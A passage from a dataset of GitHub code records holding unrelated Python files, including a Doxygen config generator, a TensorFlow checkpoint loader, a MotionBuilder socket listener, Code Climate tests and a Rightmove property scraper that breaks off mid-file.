\r\n\r\n\r\n# class example\r\nliste = [calisan1,calisan2,calisan3,calisan4]\r\nmaxi_maas = -1\r\nindex = -1\r\nfor each in liste:\r\n if(each.maas>maxi_maas):\r\n maxi_maas = each.maas\r\n index = each\r\n \r\nprint(maxi_maas)\r\nprint(index.giveNameSurname())\r\n\r\n","repo_name":"SedaNurPOLATER/Yapay_Zeka","sub_path":"sifirdan_python.py","file_name":"sifirdan_python.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9012528858","text":"import tensorflow as tf \n\n#Remove the previous zeights and bias\ntf.reset_default_graph()\n\nsave_file = './model.ckpt'\n\n#Two variables\nweights = tf.Variable(tf.truncated_normal([2,3]))\nbias = tf.Variable(tf.truncated_normal([3]))\n\n# Class used to save and/or restore Tensor variables\nsaver = tf.train.Saver()\n\nwith tf.Session() as sess:\n # Load the zeights and bias\n saver.restore(sess, save_file)\n\n # Show the values of zeights and bias\n print('Weights:')\n print(sess.run(weights))\n\n print('Bias')\n print(sess.run(bias))\n","repo_name":"EmileLIN/Deep_Learning_Fondation","sub_path":"Part2/Lesson_09_DeepLearning_in_TensorFlow/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37607247729","text":"## @file\r\n#\r\n# Copyright (c) 2011 - 2018, Intel Corporation. All rights reserved.<BR>\r\n#\r\n# SPDX-License-Identifier: BSD-2-Clause-Patent\r\n#\r\n\r\nfrom __future__ import print_function\r\nfrom __future__ import absolute_import\r\nimport os\r\n\r\nfrom .message import *\r\n\r\nclass BaseDoxygeItem:\r\n def __init__(self, name, tag=''):\r\n self.mName = name\r\n self.mTag = tag\r\n self.mDescription = ''\r\n self.mText = []\r\n\r\n def AddDescription(self, desc):\r\n self.mDescription = '%s%s' % (self.mDescription, desc)\r\n\r\n def __str__(self):\r\n return '\\n'.join(self.mText)\r\n\r\n def Generate(self):\r\n \"\"\"This interface need to be override\"\"\"\r\n\r\nclass Section(BaseDoxygeItem):\r\n def Generate(self):\r\n \"\"\"This interface need to be override\"\"\"\r\n if len(self.mTag) != 0:\r\n self.mText.append(' \\section %s %s' % (self.mName, self.mTag))\r\n else:\r\n self.mText.append(' \\section %s' % self.mName)\r\n\r\n self.mText.append(self.mDescription)\r\n return self.mText\r\n\r\nclass Page(BaseDoxygeItem):\r\n def __init__(self, name, tag=None, isSort=True):\r\n BaseDoxygeItem.__init__(self, name, tag)\r\n self.mSubPages = []\r\n self.mIsMainPage = False\r\n self.mSections = []\r\n self.mIsSort = isSort\r\n\r\n def GetSubpageCount(self):\r\n return len(self.mSubPages)\r\n\r\n def AddPage(self, subpage):\r\n self.mSubPages.append(subpage)\r\n return subpage\r\n\r\n def AddPages(self, pageArray):\r\n if pageArray is None:\r\n return\r\n for page in pageArray:\r\n self.AddPage(page)\r\n\r\n def AddSection(self, section):\r\n self.mSections.append(section)\r\n self.mSections.sort(key=lambda x: x.mName.lower())\r\n\r\n def Generate(self):\r\n if self.mIsMainPage:\r\n self.mText.append('/** \\mainpage %s' % self.mName)\r\n self.mIsSort = False\r\n else:\r\n self.mText.append('/** \\page %s %s' % (self.mTag, self.mName))\r\n\r\n if len(self.mDescription) != 0:\r\n self.mText.append(self.mDescription)\r\n endIndex = len(self.mText)\r\n\r\n self.mSections.sort(key=lambda x: x.mName.lower())\r\n for sect in self.mSections:\r\n self.mText += sect.Generate()\r\n\r\n endIndex = len(self.mText)\r\n\r\n if len(self.mSubPages) != 0:\r\n self.mText.insert(endIndex, \"<p> \\section content_index INDEX\")\r\n endIndex = len(self.mText)\r\n self.mText.insert(endIndex, '<ul>')\r\n endIndex += 1\r\n if self.mIsSort:\r\n self.mSubPages.sort(key=lambda x: x.mName.lower())\r\n for page in self.mSubPages:\r\n self.mText.insert(endIndex, '<li>\\subpage %s \\\"%s\\\" </li>' % (page.mTag, page.mName))\r\n endIndex += 1\r\n self.mText += page.Generate()\r\n self.mText.insert(endIndex, '</ul>')\r\n endIndex += 1\r\n self.mText.insert(endIndex, ' **/')\r\n return self.mText\r\n\r\nclass DoxygenFile(Page):\r\n def __init__(self, name, file):\r\n Page.__init__(self, name)\r\n self.mFilename = file\r\n self.mIsMainPage = True\r\n\r\n def GetFilename(self):\r\n return self.mFilename.replace('/', '\\\\')\r\n\r\n def Save(self):\r\n str = self.Generate()\r\n try:\r\n f = open(self.mFilename, 'w')\r\n f.write('\\n'.join(str))\r\n f.close()\r\n except IOError as e:\r\n ErrorMsg ('Fail to write file %s' % self.mFilename)\r\n return False\r\n\r\n return True\r\n\r\ndoxygenConfigTemplate = \"\"\"\r\nDOXYFILE_ENCODING = UTF-8\r\nPROJECT_NAME = %(ProjectName)s\r\nPROJECT_NUMBER = %(ProjectVersion)s\r\nOUTPUT_DIRECTORY = %(OutputDir)s\r\nCREATE_SUBDIRS = YES\r\nOUTPUT_LANGUAGE = English\r\nBRIEF_MEMBER_DESC = YES\r\nREPEAT_BRIEF = YES\r\nABBREVIATE_BRIEF = \"The $name class \" \\\\\r\n \"The $name widget \" \\\\\r\n \"The $name file \" \\\\\r\n is \\\\\r\n provides \\\\\r\n specifies \\\\\r\n contains \\\\\r\n represents \\\\\r\n a \\\\\r\n an \\\\\r\n the\r\nALWAYS_DETAILED_SEC = NO\r\nINLINE_INHERITED_MEMB = NO\r\nFULL_PATH_NAMES = YES\r\nSTRIP_FROM_PATH = %(StripPath)s\r\nSTRIP_FROM_INC_PATH =\r\nSHORT_NAMES = YES\r\nJAVADOC_AUTOBRIEF = NO\r\nQT_AUTOBRIEF = NO\r\nMULTILINE_CPP_IS_BRIEF = NO\r\nDETAILS_AT_TOP = YES\r\nINHERIT_DOCS = YES\r\nSEPARATE_MEMBER_PAGES = NO\r\nTAB_SIZE = 1\r\nALIASES =\r\nOPTIMIZE_OUTPUT_FOR_C = YES\r\nOPTIMIZE_OUTPUT_JAVA = NO\r\nBUILTIN_STL_SUPPORT = NO\r\nCPP_CLI_SUPPORT = NO\r\nSIP_SUPPORT = NO\r\nDISTRIBUTE_GROUP_DOC = YES\r\nSUBGROUPING = YES\r\nTYPEDEF_HIDES_STRUCT = NO\r\n\r\nEXTRACT_ALL = YES\r\nEXTRACT_PRIVATE = NO\r\nEXTRACT_STATIC = NO\r\nEXTRACT_LOCAL_CLASSES = NO\r\nEXTRACT_LOCAL_METHODS = NO\r\nEXTRACT_ANON_NSPACES = NO\r\nHIDE_UNDOC_MEMBERS = NO\r\nHIDE_UNDOC_CLASSES = NO\r\nHIDE_FRIEND_COMPOUNDS = NO\r\nHIDE_IN_BODY_DOCS = NO\r\nINTERNAL_DOCS = NO\r\nCASE_SENSE_NAMES = NO\r\nHIDE_SCOPE_NAMES = NO\r\nSHOW_INCLUDE_FILES = NO\r\nINLINE_INFO = YES\r\nSORT_MEMBER_DOCS = YES\r\nSORT_BRIEF_DOCS = NO\r\nSORT_BY_SCOPE_NAME = YES\r\nGENERATE_TODOLIST = YES\r\nGENERATE_TESTLIST = YES\r\nGENERATE_BUGLIST = YES\r\nGENERATE_DEPRECATEDLIST= YES\r\nENABLED_SECTIONS =\r\nMAX_INITIALIZER_LINES = 30\r\nSHOW_USED_FILES = NO\r\nSHOW_DIRECTORIES = NO\r\nFILE_VERSION_FILTER =\r\n\r\nQUIET = NO\r\nWARNINGS = YES\r\nWARN_IF_UNDOCUMENTED = YES\r\nWARN_IF_DOC_ERROR = YES\r\nWARN_NO_PARAMDOC = YES\r\nWARN_FORMAT = \"$file:$line: $text \"\r\nWARN_LOGFILE = %(WarningFile)s\r\n\r\nINPUT = %(FileList)s\r\nINPUT_ENCODING = UTF-8\r\nFILE_PATTERNS = %(Pattern)s\r\nRECURSIVE = NO\r\nEXCLUDE = *.svn\r\nEXCLUDE_SYMLINKS = NO\r\nEXCLUDE_PATTERNS = .svn\r\nEXCLUDE_SYMBOLS =\r\nEXAMPLE_PATH = %(ExamplePath)s\r\nEXAMPLE_PATTERNS = *\r\nEXAMPLE_RECURSIVE = NO\r\nIMAGE_PATH =\r\nINPUT_FILTER =\r\nFILTER_PATTERNS =\r\nFILTER_SOURCE_FILES = NO\r\n\r\nSOURCE_BROWSER = NO\r\nINLINE_SOURCES = NO\r\nSTRIP_CODE_COMMENTS = YES\r\nREFERENCED_BY_RELATION = YES\r\nREFERENCES_RELATION = YES\r\nREFERENCES_LINK_SOURCE = NO\r\nUSE_HTAGS = NO\r\nVERBATIM_HEADERS = NO\r\n\r\nALPHABETICAL_INDEX = NO\r\nCOLS_IN_ALPHA_INDEX = 5\r\nIGNORE_PREFIX =\r\n\r\nGENERATE_HTML = YES\r\nHTML_OUTPUT = html\r\nHTML_FILE_EXTENSION = .html\r\nHTML_HEADER =\r\nHTML_FOOTER =\r\nHTML_STYLESHEET =\r\nHTML_ALIGN_MEMBERS = YES\r\nGENERATE_HTMLHELP = %(WhetherGenerateHtmlHelp)s\r\nHTML_DYNAMIC_SECTIONS = NO\r\nCHM_FILE = index.chm\r\nHHC_LOCATION =\r\nGENERATE_CHI = NO\r\nBINARY_TOC = NO\r\nTOC_EXPAND = NO\r\nDISABLE_INDEX = NO\r\nENUM_VALUES_PER_LINE = 4\r\nGENERATE_TREEVIEW = %(WhetherGenerateTreeView)s\r\nTREEVIEW_WIDTH = 250\r\n\r\nGENERATE_LATEX = NO\r\nLATEX_OUTPUT = latex\r\nLATEX_CMD_NAME = latex\r\nMAKEINDEX_CMD_NAME = makeindex\r\nCOMPACT_LATEX = NO\r\nPAPER_TYPE = a4wide\r\nEXTRA_PACKAGES =\r\nLATEX_HEADER =\r\nPDF_HYPERLINKS = YES\r\nUSE_PDFLATEX = YES\r\nLATEX_BATCHMODE = NO\r\nLATEX_HIDE_INDICES = NO\r\n\r\nGENERATE_RTF = NO\r\nRTF_OUTPUT = rtf\r\nCOMPACT_RTF = NO\r\nRTF_HYPERLINKS = NO\r\nRTF_STYLESHEET_FILE =\r\nRTF_EXTENSIONS_FILE =\r\n\r\nGENERATE_MAN = NO\r\nMAN_OUTPUT = man\r\nMAN_EXTENSION = .3\r\nMAN_LINKS = NO\r\n\r\nGENERATE_XML = NO\r\nXML_OUTPUT = xml\r\nXML_SCHEMA =\r\nXML_DTD =\r\nXML_PROGRAMLISTING = YES\r\n\r\nGENERATE_AUTOGEN_DEF = NO\r\n\r\nGENERATE_PERLMOD = NO\r\nPERLMOD_LATEX = NO\r\nPERLMOD_PRETTY = YES\r\nPERLMOD_MAKEVAR_PREFIX =\r\n\r\nENABLE_PREPROCESSING = YES\r\nMACRO_EXPANSION = YES\r\nEXPAND_ONLY_PREDEF = YES\r\nSEARCH_INCLUDES = YES\r\nINCLUDE_PATH = %(IncludePath)s\r\nINCLUDE_FILE_PATTERNS = *.h\r\nPREDEFINED = %(PreDefined)s\r\nEXPAND_AS_DEFINED =\r\nSKIP_FUNCTION_MACROS = NO\r\n\r\nTAGFILES =\r\nGENERATE_TAGFILE =\r\nALLEXTERNALS = NO\r\nEXTERNAL_GROUPS = YES\r\nPERL_PATH = /usr/bin/perl\r\n\r\nCLASS_DIAGRAMS = NO\r\nMSCGEN_PATH =\r\nHIDE_UNDOC_RELATIONS = YES\r\nHAVE_DOT = NO\r\nCLASS_GRAPH = YES\r\nCOLLABORATION_GRAPH = YES\r\nGROUP_GRAPHS = YES\r\nUML_LOOK = NO\r\nTEMPLATE_RELATIONS = NO\r\nINCLUDE_GRAPH = YES\r\nINCLUDED_BY_GRAPH = YES\r\nCALL_GRAPH = NO\r\nCALLER_GRAPH = NO\r\nGRAPHICAL_HIERARCHY = YES\r\nDIRECTORY_GRAPH = YES\r\nDOT_IMAGE_FORMAT = png\r\nDOT_PATH =\r\nDOTFILE_DIRS =\r\nDOT_GRAPH_MAX_NODES = 50\r\nMAX_DOT_GRAPH_DEPTH = 1000\r\nDOT_TRANSPARENT = YES\r\nDOT_MULTI_TARGETS = NO\r\nGENERATE_LEGEND = YES\r\nDOT_CLEANUP = YES\r\n\r\nSEARCHENGINE = NO\r\n\r\n\"\"\"\r\nclass DoxygenConfigFile:\r\n def __init__(self):\r\n self.mProjectName = ''\r\n self.mOutputDir = ''\r\n self.mFileList = []\r\n self.mIncludeList = []\r\n self.mStripPath = ''\r\n self.mExamplePath = ''\r\n self.mPattern = ['*.c', '*.h',\r\n '*.asm', '*.s', '.nasm', '*.html', '*.dox']\r\n self.mMode = 'HTML'\r\n self.mWarningFile = ''\r\n self.mPreDefined = []\r\n self.mProjectVersion = 0.1\r\n\r\n def SetChmMode(self):\r\n self.mMode = 'CHM'\r\n\r\n def SetHtmlMode(self):\r\n self.mMode = 'HTML'\r\n\r\n def SetProjectName(self, str):\r\n self.mProjectName = str\r\n\r\n def SetProjectVersion(self, str):\r\n self.mProjectVersion = str\r\n\r\n def SetOutputDir(self, str):\r\n self.mOutputDir = str\r\n\r\n def SetStripPath(self, str):\r\n self.mStripPath = str\r\n\r\n def SetExamplePath(self, str):\r\n self.mExamplePath = str\r\n\r\n def SetWarningFilePath(self, str):\r\n self.mWarningFile = str.replace('\\\\', '/')\r\n\r\n def FileExists(self, path):\r\n if path is None:\r\n return False\r\n if len(path) == 0:\r\n return False\r\n\r\n for p in self.mFileList:\r\n if path.lower() == p.lower():\r\n return True\r\n\r\n return False\r\n\r\n def AddFile(self, path):\r\n if path is None:\r\n return\r\n\r\n if len(path) == 0:\r\n return\r\n path = path.replace('\\\\', '/')\r\n if not self.FileExists(path):\r\n self.mFileList.append(path)\r\n\r\n def AddIncludePath(self, path):\r\n path = path.replace('\\\\', '/')\r\n if path not in self.mIncludeList:\r\n self.mIncludeList.append(path)\r\n\r\n def AddPattern(self, pattern):\r\n self.mPattern.append(pattern)\r\n\r\n def AddPreDefined(self, macro):\r\n self.mPreDefined.append(macro)\r\n\r\n def Generate(self, path):\r\n files = ' \\\\\\n'.join(self.mFileList)\r\n includes = ' \\\\\\n'.join(self.mIncludeList)\r\n patterns = ' \\\\\\n'.join(self.mPattern)\r\n if self.mMode.lower() == 'html':\r\n sHtmlHelp = 'NO'\r\n sTreeView = 'YES'\r\n else:\r\n sHtmlHelp = 'YES'\r\n sTreeView = 'NO'\r\n\r\n text = doxygenConfigTemplate % {'ProjectName':self.mProjectName,\r\n 'OutputDir':self.mOutputDir,\r\n 'StripPath':self.mStripPath,\r\n 'ExamplePath':self.mExamplePath,\r\n 'FileList':files,\r\n 'Pattern':patterns,\r\n 'WhetherGenerateHtmlHelp':sHtmlHelp,\r\n 'WhetherGenerateTreeView':sTreeView,\r\n 'IncludePath':includes,\r\n 'WarningFile':self.mWarningFile,\r\n 'PreDefined':' '.join(self.mPreDefined),\r\n 'ProjectVersion':self.mProjectVersion}\r\n try:\r\n f = open(path, 'w')\r\n f.write(text)\r\n f.close()\r\n except IOError as e:\r\n ErrorMsg ('Fail to generate doxygen config file %s' % path)\r\n return False\r\n\r\n return True\r\n\r\n########################################################################\r\n# TEST CODE\r\n########################################################################\r\nif __name__== '__main__':\r\n df = DoxygenFile('Platform Document', 'm:\\tree')\r\n df.AddPage(Page('Module', 'module'))\r\n p = df.AddPage(Page('Library', 'library'))\r\n p.AddDescription(desc)\r\n p.AddPage(Page('PCD', 'pcds'))\r\n\r\n df.Generate()\r\n print(df)\r\n","repo_name":"CloverHackyColor/CloverBootloader","sub_path":"BaseTools/Scripts/PackageDocumentTools/plugins/EdkPlugins/basemodel/doxygen.py","file_name":"doxygen.py","file_ext":"py","file_size_in_byte":13400,"program_lang":"python","lang":"en","doc_type":"code","stars":4186,"dataset":"github-code","pt":"53"} +{"seq_id":"4850464124","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport os\nimport glob\n\nfrom distutils.extension import Extension\n\nimport numpy\nfrom extension_helpers import import_file\n\nERFAPKGDIR = os.path.relpath(os.path.dirname(__file__))\n\nERFA_SRC = os.path.abspath(os.path.join(ERFAPKGDIR, '..', '..',\n 'cextern', 'erfa'))\n\nSRC_FILES = glob.glob(os.path.join(ERFA_SRC, '*'))\nSRC_FILES += [os.path.join(ERFAPKGDIR, filename)\n for filename in ['pav2pv.c', 'pv2pav.c', 'erfa_additions.h',\n 'ufunc.c.templ', 'core.py.templ',\n 'erfa_generator.py']]\n\nGEN_FILES = [os.path.join(ERFAPKGDIR, 'core.py'),\n os.path.join(ERFAPKGDIR, 'ufunc.c')]\n\n\ndef get_extensions():\n\n gen = import_file(os.path.join(ERFAPKGDIR, 'erfa_generator.py'))\n gen.main(verbose=False)\n\n sources = [os.path.join(ERFAPKGDIR, fn)\n for fn in (\"ufunc.c\", \"pav2pv.c\", \"pv2pav.c\")]\n\n include_dirs = [numpy.get_include()]\n\n libraries = []\n\n if (int(os.environ.get('ASTROPY_USE_SYSTEM_ERFA', 0)) or\n int(os.environ.get('ASTROPY_USE_SYSTEM_ALL', 0))):\n libraries.append('erfa')\n else:\n # get all of the .c files in the cextern/erfa directory\n erfafns = os.listdir(ERFA_SRC)\n sources.extend(['cextern/erfa/' + fn\n for fn in erfafns if fn.endswith('.c')])\n\n include_dirs.append('cextern/erfa')\n\n erfa_ext = Extension(\n name=\"astropy._erfa.ufunc\",\n sources=sources,\n include_dirs=include_dirs,\n libraries=libraries,\n language=\"c\",)\n\n return [erfa_ext]\n","repo_name":"pyaetherometry/laughing-octo-tribble","sub_path":"pyaetherometry/extern/astropy/astropy/_erfa/setup_package.py","file_name":"setup_package.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36688365212","text":"import numpy as np\nfrom scipy import signal\nfrom scipy.signal import lfilter\nimport matplotlib.pyplot as plt\n\na1 = 0.4\na2 = 0.95\na3 = (-0.95)\n\nn = np.linspace(0,50,51)\nl = np.linspace(-50,50,101)\nf = np.linspace(-0.5,0.5,101)\n\n#We get diffrent x values\nx1 = a1**n\nx2 = a2**n\nx3 = a3**n\n#We now need to get the autocorrelation values\nr_xx1 = a1**(np.abs(l))/(1-a1**2)\nr_xx2 = a2**(np.abs(l))/(1-a2**2)\nr_xx3 = a3**(np.abs(l))/(1-a3**2)\n#Get diffrent Sxx(f)\n\ns_xx1 = 1/(1-2*a1*np.cos(2*np.pi*f)+a1**2)\ns_xx2 = 1/(1-2*a2*np.cos(2*np.pi*f)+a2**2)\ns_xx3 = 1/(1-2*a3*np.cos(2*np.pi*f)+a3**2)\n\nplt.plot(f, s_xx1, label='s_xx[f] plotted with a = 0.4')\nplt.plot(f, s_xx2, label='s_xx[f] plotted with a = 0.95')\nplt.plot(f, s_xx3, label='s_xx[f] plotted with a = -0.95')\n\n# Add labels, legend, and title\nplt.xlabel('f')\nplt.ylabel('Diffrent s_xx[f]s')\nplt.legend()\nplt.title('Plot of s_xx[f] with diffrent a values')\n\n# Show the plot\nplt.show()\n","repo_name":"Mamolb/DigSig","sub_path":"DigSig Øving 5/Oppgave1.py","file_name":"Oppgave1.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8241155261","text":"import socket\nimport pyfbsdk_init\nimport pyfbsdk\n\nfrom pyfbsdk import FBApplication, FBSystem, FBFindModelByLabelName, FBBodyNodeId, FBTime, FBTake\n\n# Create a new server socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nport = 12345 # change to your port\nsock.bind(('localhost', port))\nsock.listen(1)\n\n# Get the system\nsystem = pyfbsdk.FBSystem()\n\n# Get the model (the joint you want to control)\n# Replace 'WristJoint' with the actual name of your joint\nmodel = FBFindModelByLabelName('WristJoint')\n\n\nwhile True:\n print(\"Waiting for a connection...\")\n connection, client_address = sock.accept()\n\n try:\n print(\"Connection from\", client_address)\n\n # Receive the data in small chunks\n while True:\n data = connection.recv(16)\n if data:\n # Assuming you are receiving quaternion as w,x,y,z floats\n q = list(map(float, data.decode('utf-8').split(',')))\n\n # Make sure we have exactly 4 values\n if len(q) != 4:\n print(\"Invalid data received\")\n break\n\n # Apply the quaternion to the joint rotation\n model.Rotation = pyfbsdk.FBRVector(q[0], q[1], q[2], q[3])\n else:\n break\n finally:\n # Clean up the connection\n connection.close()","repo_name":"DarukuFureinMasta/HipDysplasiaUTEC","sub_path":"XSensVR/XSensPythonVr/MoBu_receiving.py","file_name":"MoBu_receiving.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9956452653","text":"# cs50のライブラリでSQLを操作している。\nfrom cs50 import SQL\n\n# データベースに接続\ndb = SQL(\"sqlite:///manga.db\")\n\nkeyword = \"犬\"\n\n# ペアレントテーブルから重複しないようにタイトルのみ選択\ntitles = db.execute(\n \"SELECT title FROM parent WHERE title LIKE ? OR author LIKE ? GROUP BY title\", ('%'+keyword+'%',), ('%'+keyword+'%',))\n\nprint(type(titles))\n\n# 作品名だけのリスト\ntitle_list = []\nfor i in titles:\n title_list.append(i[\"title\"])\nprint(title_list)\nprint(len(title_list))\n\ntest = [\"犬と屑\", \"プールと犬\"]\n\n# 作品名の数だけプレースホルダの確保\nstmt_formats = ','.join(['%s'] * (len(title_list)-1) )\n# ペアレントテーブルから重複しないようにタイトル、著者、あらすじ、写真を選択\n#name_db = db.execute(f\"SELECT title, author, img_url, summary FROM parent IN {tuple(test)}\")\n#test_db = db.execute(\n# \"SELECT title, author, img_url, summary FROM parent WHERE title IN ?\", title_list)\nbook_db = db.execute(\n \"SELECT title, author, img_url, summary FROM parent WHERE title IN (%s)\" % stmt_formats, tuple(title_list))\n\n\n\n","repo_name":"ReiSasajima/white-tshirt","sub_path":"pra.py","file_name":"pra.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35126115534","text":"from src.city import City\n\n\ndef get_cities_from_lists(x, y):\n cities = []\n for i in range(len(x)):\n cities.append(City(i, x[i], y[i]))\n return cities\n\n\ndef get_x_list(cities, order):\n values = []\n for i in range(len(order)):\n values.append(cities[order[i]].x)\n return values\n\n\ndef get_y_list(cities, order):\n values = []\n for i in range(len(order)):\n values.append(cities[order[i]].y)\n return values\n","repo_name":"vegetablecode/ai-chapter","sub_path":"genetic-algorithm/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30908959430","text":"import os\n\nfrom collections import OrderedDict as SortedDict\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nfrom django.utils._os import safe_join\n\nfrom django.contrib.staticfiles import utils, finders\n\n\nclass ThemeFinder(finders.BaseFinder):\n \"\"\"Finder of static files for our themes.\n\n Themes are installed at $INSTANCE/themes/ directory. Inside that directory custom themes can have\n static files for using over the web. This ThemeFinder will find these files and put them with\n the rest of the static files on the system.\n \"\"\"\n\n def __init__(self, apps=None, *args, **kwargs):\n # List of locations with static files\n self.locations = []\n # Maps dir paths to an appropriate storage instance\n self.storages = SortedDict()\n\n for theme_name in os.listdir('{}/themes/'.format(settings.BOOKTYPE_ROOT)):\n theme_dir = '{}/themes/{}'.format(settings.BOOKTYPE_ROOT, theme_name)\n static_dir = '{}/static/'.format(theme_dir)\n\n if os.path.isdir(static_dir):\n theme_prefix = 'themes/{}'.format(theme_name)\n self.locations.append((theme_prefix, static_dir))\n\n filesystem_storage = FileSystemStorage(location=static_dir)\n filesystem_storage.prefix = theme_prefix\n self.storages[static_dir] = filesystem_storage\n\n super(ThemeFinder, self).__init__(*args, **kwargs)\n\n def find(self, path, all=False):\n matches = []\n for prefix, root in self.locations:\n matched_path = self.find_location(root, path, prefix)\n if matched_path:\n if not all:\n return matched_path\n matches.append(matched_path)\n return matches\n\n def find_location(self, root, path, prefix=None):\n if prefix:\n prefix = '%s%s' % (prefix, os.sep)\n if not path.startswith(prefix):\n return None\n path = path[len(prefix):]\n path = safe_join(root, path)\n if os.path.exists(path):\n return path\n\n def list(self, ignore_patterns):\n for prefix, root in self.locations:\n storage = self.storages[root]\n for path in utils.get_files(storage, ignore_patterns):\n yield path, storage\n","repo_name":"booktype/Booktype","sub_path":"lib/booktype/apps/themes/finder.py","file_name":"finder.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":894,"dataset":"github-code","pt":"53"} +{"seq_id":"30843826423","text":"import unittest\n\nfrom code_climate import models, exceptions\nfrom tests.unit.tests_models import ModelTestMixin\n\n\nclass TestModelOrganization(ModelTestMixin, unittest.TestCase):\n @property\n def sample_name(self):\n return 'orgs'\n\n def test_fields(self):\n data = self.samples[0]\n organization = models.Organization(data=data)\n\n self.assertEqual('58da767f6261830264001e69', organization.id)\n self.assertEqual(\"joaodaher\", organization.name)\n\n def test_fields_repositories(self):\n data = self.samples[0]\n organization = models.Organization(data=data)\n\n repository_data = [{'id': 10}, {'id': 20}]\n with self.patch_get(data=repository_data) as get:\n repositories = list(organization.repositories)\n\n self.assertEqual(2, len(repositories))\n [repo_a, repo_b] = repositories\n self.assertEqual(10, repo_a.id)\n self.assertEqual(20, repo_b.id)\n\n self.assertPaginated(\n patched=get,\n resource='repos',\n id=organization.id,\n from_resource='orgs',\n number_of_pages=3,\n )\n\n def test_invalid_field(self):\n organization = models.Organization(data={})\n with self.assertRaises(exceptions.UnexpectedDataFormat):\n organization.name # pylint: disable=pointless-statement\n\n def test_list(self):\n data = self.samples\n with self.patch_get(data=data) as get:\n organizations_iter = models.Organization.list()\n\n organizations = list(organizations_iter)\n self.assertEqual(2, len(organizations))\n\n [organization_a, organization_b] = organizations\n sample_a, sample_b = self.samples\n self.assertEqual(sample_a, organization_a._data)\n self.assertEqual(sample_b, organization_b._data)\n\n self.assertPaginated(patched=get, resource='orgs', number_of_pages=3)\n\n def test_detail(self):\n data = self.samples[0]\n with self.patch_get(data=data) as get:\n organization = models.Organization.get(id=42)\n\n sample = self.samples[0]\n self.assertEqual(sample, organization._data)\n\n get.assert_called_once_with(resource='orgs', id=42)\n\n def test_not_found(self):\n with self.patch_get_error(status_code=404) as get:\n with self.assertRaises(exceptions.DoesNotExist):\n models.Organization.get(id=666)\n\n self.assertEqual(1, get.call_count)\n","repo_name":"edukorg/code-climate-py","sub_path":"tests/unit/tests_models/tests_organization.py","file_name":"tests_organization.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37500242220","text":"import urllib\nimport requests\nfrom sqlalchemy.sql.functions import user\nimport urllib3\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom math import ceil\nfrom datetime import date\nimport pyodbc\nimport db_passwords as cfg\nimport sqlalchemy\n# URL = 'https://www.rightmove.co.uk/property-for-sale/find.html?searchType=SALE&locationIdentifier=REGION^93968&insId=1&radius=0.25&minPrice=450000&maxPrice=550000&minBedrooms=2&displayPropertyType=&maxDaysSinceAdded=&_includeSSTC=on&sortByPriceDescending=&primaryDisplayPropertyType=&secondaryDisplayPropertyType=&oldDisplayPropertyType=&oldPrimaryDisplayPropertyType=&newHome=&auction=false&index=288'\n\n\ndef get_page_count(http, payload):\n\n r = http.request(\n 'GET', 'https://www.rightmove.co.uk/property-for-sale/find.html', fields=payload)\n\n soup = BeautifulSoup(r.data, 'html.parser')\n\n num_of_props = soup.find(\"span\", \"searchHeader-resultCount\").text\n print(\"I have found {} properties: \".format(num_of_props))\n num_of_props = int(num_of_props)\n page_count = int(num_of_props / 24)\n if num_of_props % 24 > 0:\n page_count += 1\n\n if page_count > 42:\n page_count = 42\n\n print(\"This is {} pages\".format(page_count))\n\n return page_count\n\n\ndef extract_from_api(save_to_disk, partial_data):\n page_index_num = 0\n http = urllib3.PoolManager()\n\n payload = {\n 'searchType': 'SALE',\n 'locationIdentifier': 'REGION^746',\n 'insId': 1,\n 'radius': 0,\n 'minPrice': 450000,\n 'maxPrice': 550000,\n 'minBedrooms': 2,\n 'maxDaysSinceAdded': '',\n 'displayPropertyType': '',\n '_includeSSTC': 'on',\n 'sortByPriceDescending': '',\n 'primaryDisplayPropertyType': '',\n 'secondaryDisplayPropertyType': '',\n 'oldDisplayPropertyType': '',\n 'oldPrimaryDisplayPropertyType': '',\n 'newHome': '',\n 'auction': 'false',\n 'index': page_index_num,\n }\n\n total_pages = get_page_count(http, payload)\n\n property_list = []\n property_address = []\n property_price = []\n property_link = []\n key_val = []\n\n if partial_data:\n total_pages = 1\n\n for page in range(total_pages):\n # for page in range(3):\n page_index_num = 24 * page\n print(\"Page: {} - Index I will use is: {}\".format(page, page_index_num))\n\n payload[\"index\"] = page_index_num\n\n r = http.request(\n 'GET', 'https://www.rightmove.co.uk/property-for-sale/find.html', fields=payload)\n # First of all we get the propery names.\n soup = BeautifulSoup(r.data, 'html.parser')\n\n for prop_name in soup.find_all(\"h2\", \"propertyCard-title\"):\n clean_prop_name = prop_name.text.strip()\n print(clean_prop_name)\n if clean_prop_name == 'Property':\n print(\"I'm breaking because the prop name is blank\")\n break\n property_list.append(clean_prop_name)\n\n for prop_address in soup.find_all(\"address\", \"propertyCard-address\"):\n clean_prop_address = prop_address.text.strip()\n if clean_prop_address == '':\n break\n property_address.append(clean_prop_address)\n\n for prop_price in soup.find_all(\"div\", \"propertyCard-priceValue\"):\n clean_prop_price = (prop_price.text.strip().replace(',', ''))\n # Removes the POUND sign for now, it displays kinda funny and doesn't export well to Excel.\n if clean_prop_price == '':\n break\n property_price.append(clean_prop_price[1:])\n\n for prop_link in 